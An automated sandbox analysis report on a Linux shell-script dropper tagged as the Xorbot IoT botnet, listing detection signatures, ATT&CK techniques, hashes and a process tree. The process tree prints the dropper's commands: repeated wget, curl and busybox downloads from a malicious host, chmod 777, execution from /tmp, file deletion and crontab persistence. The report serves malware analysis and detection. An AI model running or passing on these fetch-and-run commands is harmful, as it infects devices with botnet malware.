Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
-
submitted
18-02-2025 06:38
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3b8f13c77b91143ded11816a83e96419
-
SHA1
00dbeb3fd6f2a3dfbd0a62ca7a5ce0139a084080
-
SHA256
b47ff68519a485ddb5bf1290c6da508b0ff3cf0da72c86f8be5f828c04f96d2a
-
SHA512
a9303523d84c55af538abc57b0b413bae8be0a58f9f2cf854df9530f8384bf6c1eb54fe98aab0834b0042e680c682b030c14fd52213caf3c27945664578a0676
-
SSDEEP
192:qzm/wl616t6wnbJ86yT0sza616t6wnH26yT0sz3:qzm/wl616t6wnt86yT0sza616t6wnW6w
Malware Config
Signatures
-
Detects Xorbot 4 IoCs
-
Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
-
Xorbot family
-
Contacts a large (1579) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 5 IoCs
-
Renames itself 1 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 16 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj2⤵
- File and Directory Permissions Modification
-
-
/tmp/0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj./0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj2⤵
-
-
/bin/rmrm 0Qsvh3Z3LbAvBnsOwpKxdfyGo2oAjrqrsj2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT2⤵
- File and Directory Permissions Modification
-
-
/tmp/Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT./Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT2⤵
-
-
/bin/rmrm Y1pzCIbnBBbqd5pYqo02Y8j7xBG93BcfsT2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE2⤵
- File and Directory Permissions Modification
-
-
/tmp/B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE./B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE2⤵
-
-
/bin/rmrm B1w1n3rCWWe0i5H1lKioZs771usKw3nNpE2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE2⤵
- File and Directory Permissions Modification
-
-
/tmp/sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE./sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE2⤵
-
-
/bin/rmrm sUGhL1LBcQC2LOr8ll2Wypo5dNiZ7BlkHE2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt2⤵
- File and Directory Permissions Modification
-
-
/tmp/bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt./bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt2⤵
- Renames itself
- Reads runtime system information
-
/bin/shsh -c "crontab -l"3⤵
-
/usr/bin/crontabcrontab -l4⤵
-
-
-
/bin/shsh -c "crontab -"3⤵
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
-
-
-
-
/bin/rmrm bTC7hiTfFeXMLxXcd9CWmuKNQv1dUjm7Jt2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cR8g7mQo7cqv11L61BOzyoE1qJxDoLA0H42⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5701e7a55a4f3650f5feee92a9860e5fc
SHA16ce4a7f0dc80fe557a0ace4de25e6305af221ed4
SHA256ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588
SHA5127352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
111KB
MD5ca897a38f23ec23521ce0b1b83f8422d
SHA1b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
SHA256043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
SHA51210d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
91KB
MD5dc9b1c055388f5520170f883e771defa
SHA186793154bd4076992225054b62e9eeedbec3164c
SHA256b871a950cb0b7302394969438bc6e1303394a33bdb980134a8a27119c076e21b
SHA512208bef8f82b33e7234297ce41dc30077481b97f62f6a30ff21c07d40282b736482c6f18f3f44cde071d59fcb0ab32eeb06a9de8c1fef5636e85b36cfae0c32fd
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
210B
MD5905c4be5bea734b8e3aba8e1cfc507a3
SHA13dff5262d838ff693628c3d8ed7332b02a4dfa61
SHA256579c802ec72fa5892aeb8e6aad5fac244c39ece427bae85e06fab38692b4f3b6
SHA512c0c14a5301c7216abddd74ce79e7061d2422b8066b940ef5d55e3d77ed04e675e589751e7309ed068c3858e65752900e3abcc98f2852bd6868656b29ed31594d